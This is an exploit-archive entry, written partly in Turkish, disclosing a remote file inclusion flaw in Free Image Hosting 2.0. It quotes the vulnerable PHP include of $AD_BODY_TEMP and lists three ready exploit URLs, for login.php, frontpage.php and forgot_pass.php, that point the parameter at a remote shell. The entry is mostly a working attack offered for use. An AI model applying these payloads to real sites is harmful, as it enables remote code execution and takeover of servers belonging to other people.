id: 1650
date: 03/25/2007
title: Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
author: Crackers_Child
cves: 

====================================================================
Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
====================================================================


############################################################################################
Baslik  :Image_Upload Script  Remote File Inclusion Exploit
         Free Image Hosting 2.0

Bulan   :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

        : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

        :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not     :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz  : EveryBody
############################################################################################



#  0day.today [2023-03-27]  #